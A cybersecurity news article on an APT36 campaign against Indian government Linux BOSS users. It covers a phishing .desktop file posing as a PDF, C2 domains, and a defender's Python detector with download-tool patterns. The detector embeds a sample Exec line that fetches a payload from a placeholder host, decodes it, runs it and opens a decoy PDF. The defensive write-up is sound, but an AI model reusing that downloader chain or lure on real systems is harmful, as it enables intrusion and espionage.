The threat landscape in South Asia has taken a new turn with the resurgence of APT36 (Transparent Tribe)—a Pakistan-based, state-sponsored threat group known for long-term espionage operations. According to a new CYFIRMA report, the group has launched an advanced cyber-espionage campaign targeting Indian government entities, with a particular focus on the Linux BOSS operating system.
As CYFIRMA notes, “APT36’s capability to customize its delivery mechanisms according to the victim’s operating environment thereby increases its chances of success while maintaining persistent access to critical government infrastructure and evading traditional security controls.”
The campaign begins with highly tailored spear phishing emails. Victims receive a weaponized archive file (Meeting_Notice_Ltr_ID1543ops.pdf_.zip) that contains a disguised .desktop shortcut. While masquerading as a simple PDF file, this shortcut executes a chain of commands when opened.

The report explains: “The ‘.desktop’ file is crafted to masquerade as an ordinary PDF shortcut but contains a chain of commands embedded in its Exec= line that are executed automatically and sequentially as soon as the file is launched.”
These commands download a malicious payload from attacker-controlled infrastructure, convert it into binary form, and execute it—while simultaneously opening a decoy PDF in Firefox to trick the victim into believing nothing unusual occurred.
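A defender-side check for the lure described above, written here as an added example rather than code from the CYFIRMA report: it parses a .desktop file and flags the traits of this chain (a PDF-style name on an Application entry, a downloader, a decode-to-binary step, command chaining and a decoy PDF in the Exec= line). Both sample entries and the c2.invalid host are constructed for the demonstration.

```python
import re

# Heuristics mirror the chain the report describes: a shortcut dressed up as a
# PDF whose Exec= line downloads a payload, decodes it to a binary, runs it,
# and opens a decoy PDF so the victim sees nothing unusual.
CHECKS = [
    ("downloader in Exec", re.compile(r"\b(curl|wget)\b")),
    ("decode-to-binary in Exec", re.compile(r"\b(base64\s+(-d|--decode)|xxd\s+-r)\b")),
    ("command chaining in Exec", re.compile(r"(;|&&|\|\|)")),
    ("decoy PDF opened in Exec", re.compile(r"\b(firefox|xdg-open|evince)\b[^;&|]*\.pdf\b", re.I)),
    ("chmod +x in Exec", re.compile(r"\bchmod\s+\+x\b")),
]

def parse_desktop_entry(text: str) -> dict:
    """Minimal parser for the [Desktop Entry] group of a .desktop file."""
    entry, in_group = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):            # a new group starts
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, _, value = line.partition("=")
            entry[key.strip()] = value.strip()
    return entry

def analyze_desktop(text: str, filename: str) -> list[str]:
    """Return the suspicious traits found in one .desktop file (empty = clean)."""
    entry, findings = parse_desktop_entry(text), []
    if filename.lower().endswith(".desktop") and ".pdf" in filename.lower():
        findings.append("double extension: PDF name on a .desktop file")
    name, icon = entry.get("Name", ""), entry.get("Icon", "")
    if entry.get("Type") == "Application" and (name.lower().endswith(".pdf") or "pdf" in icon.lower()):
        findings.append("Application entry presenting itself as a PDF")
    exec_line = entry.get("Exec", "")
    findings += [label for label, pattern in CHECKS if pattern.search(exec_line)]
    return findings

# Constructed samples: one modelled on the reported lure (placeholder host), one benign launcher.
MALICIOUS_SAMPLE = """[Desktop Entry]
Type=Application
Name=Meeting_Notice.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -s http://c2.invalid/p.txt -o /tmp/p.txt; base64 -d /tmp/p.txt > /tmp/p; chmod +x /tmp/p; /tmp/p & firefox /tmp/decoy.pdf"
"""
BENIGN_SAMPLE = "[Desktop Entry]\nType=Application\nName=Firefox\nExec=firefox %u\nIcon=firefox\n"

if __name__ == "__main__":
    for fname, body in (("Meeting_Notice.pdf.desktop", MALICIOUS_SAMPLE), ("firefox.desktop", BENIGN_SAMPLE)):
        print(fname, "->", analyze_desktop(body, fname) or "no findings")
```

Run it over every `.desktop` file extracted from inbound archives or dropped into `~/Desktop` and `~/.local/share/applications`; two or more findings on one file is worth an alert.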
Unlike traditional Transparent Tribe campaigns that often target Windows environments, this campaign represents a tactical shift. The focus on Linux BOSS, an indigenous Indian government operating system, demonstrates the adversary’s intent to bypass hardened defenses.
CYFIRMA emphasizes: “The adoption of .desktop payloads targeting Linux BOSS reflects a tactical shift toward exploiting indigenous technologies. Combined with traditional Windows-based malware and mobile implants, this shows the group’s intent to diversify access vectors and ensure persistence even in hardened environments.”
The malware communicates with newly registered malicious domains, including securestore[.]cv and modgovindia[.]space, both flagged as suspicious infrastructure linked to APT36.
Static and dynamic analysis revealed that the ELF malware establishes persistence by creating cron jobs and enabling disguised system services. CYFIRMA observed that “the malware established command-and-control (C2) communication with the domain modgovindia[.]space, which resolves to the IP address 45[.]141[.]58[.]199, over port 4000.”
This infrastructure enables exfiltration of sensitive data while maintaining covert access for long-term espionage.
APT36, also known as Transparent Tribe or Mythic Leopard, has been active for more than a decade. Its campaigns typically align with Pakistan’s strategic objectives, particularly targeting Indian government, military, diplomatic, and critical infrastructure sectors.
The report highlights that “APT36’s persistent targeting reflects its strategic objective of collecting sensitive information to support Pakistan’s military and diplomatic priorities.”
Notably, the group has expanded its reach to include education, research, and civil society organizations, increasing the risk to diplomatic partners and supply chains.
The CYFIRMA analysis underscores how APT36 continues to evolve. By adopting multi-platform delivery strategies, leveraging .desktop files for Linux environments, and embedding persistence in system-level processes, the group demonstrates its growing sophistication and adaptability.
As the report concludes: “The group’s ability to rapidly deploy tailored payloads and infrastructure demonstrates increasing sophistication and underscores the need for heightened vigilance, particularly around spear-phishing vectors and Linux-based attack surfaces.”